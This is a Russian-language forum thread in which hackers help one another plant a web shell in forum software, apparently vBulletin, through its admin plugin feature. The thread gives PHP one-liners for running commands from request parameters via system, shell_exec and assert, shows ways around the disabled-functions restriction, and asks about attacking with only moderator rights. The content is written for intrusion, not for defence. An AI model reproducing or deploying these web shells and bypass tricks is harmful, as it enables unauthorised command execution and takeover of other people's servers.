создал свой плюгин
Plugins & Products ->Add New Plugin->faq_complete
с содержимым: system($_GET["cmd"]);
делаю плюгин активным...
делаю запрос:admincp/faq.php?cmd=ls
и тупо никакой реакции :(
в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ?

system может быть в дизабл функшионс, сначала посмотри phpinfo

eval попробуй заюзать

создал свой плюгин
Plugins & Products ->Add New Plugin->faq_complete
с содержимым: system($_GET["cmd"]);
делаю плюгин активным...
делаю запрос:admincp/faq.php?cmd=ls
и тупо никакой реакции :(
в чём причина ? может тупо в новой версии не катит такой способ заливки шелла ?

faq.php находится в корне форума..а не в админке.

гыгы))) реально) фига я тупанул) спасибо большое тебе) а то так бы и тупил)

что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons " :rolleyes:

что можно сделать когда system, passthru, exec запрещены? "has been disabled for security reasons " :rolleyes:
Воспользоваться альтернативой если такая имеется.. :)
К примеру: shell_exec
<? echo(shell_exec('id')); ?>
Либо обходится средствами php.

shell_exec, eval тоже в запрете.
будем курить php :(

<?assert($_REQUEST[a]);?>

http://site/script.php?a=phpinfo();

и еще куча вариантов

А вот на счет 4.0.2 + права модера?

Реально ли?